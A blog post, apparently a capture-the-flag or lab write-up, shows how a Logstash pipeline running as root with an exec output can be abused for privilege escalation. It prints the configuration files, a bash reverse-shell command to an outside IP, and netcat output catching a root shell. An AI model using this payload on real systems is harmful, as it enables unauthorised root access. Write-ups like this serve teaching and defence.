Exploiting Logstash for Root Shell

Hi Red Team

Today, I am going to share on how to do the post exploitation by abusing the logstash configuration on the victim machine.

I found logstash is running under root privilege when I did the post exploitation enumeration using linpeas.sh

Lets find out more configuration setting of the logstash. It is normally located in the /etc/logstash/conf.d/

Let’s check the input.conf

input {
        file {
                path => "/opt/kibana/logstash_*"
                start_position => "beginning"
                sincedb_path => "/dev/null"
                stat_interval => "10 second"
                type => "execute"
                mode => "read"
        }
}

Let’s check the filter.conf

filter {
        if [type] == "execute" {
                grok {
                        match => { "message" => "Exec_This\s*Command\s*:\s+%{GREEDYDATA:Command}" }
                }
        }
}

Lets check the output.conf

output {
        if [type] == "execute" {
                stdout { codec => json }
                exec {
                        command => "%{Command} &"
                }
        }
}

So, based on the above 3 configuration files input, filter and output then we can conclude that the logstash will try to load file from /opt/kibana/logstash_* so all files with name start with logstash_ will be loaded and read. Then with the information from the filter.conf we can see that it will do text search with patter “Exec_This Command : [COMMAND]” and finally the output.conf configuration tells us that it will execute the [COMMAND].

To exploit this configuration then we can create a file in /opt/kibana/logstash_execute which contain this command to create reverse shell

echo 'Exec_This Command : bash -i >& /dev/tcp/10.10.14.92/9091 0>&1' > /opt/kibana/logstash_execute

Then you need to start nc server on your machine to receive the reverse shell. After waiting for few minutes then the scheduler under root will run the logstash read and execute the reverse shell

$ rlwrap nc -nlvp 9091                                                                                                                                                                                                                   
listening on [any] 9091 ...                                                                                                                                                                                                                
connect to [10.10.14.92] from (UNKNOWN) [10.129.175.228] 41724

We got the reverse connection as root

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s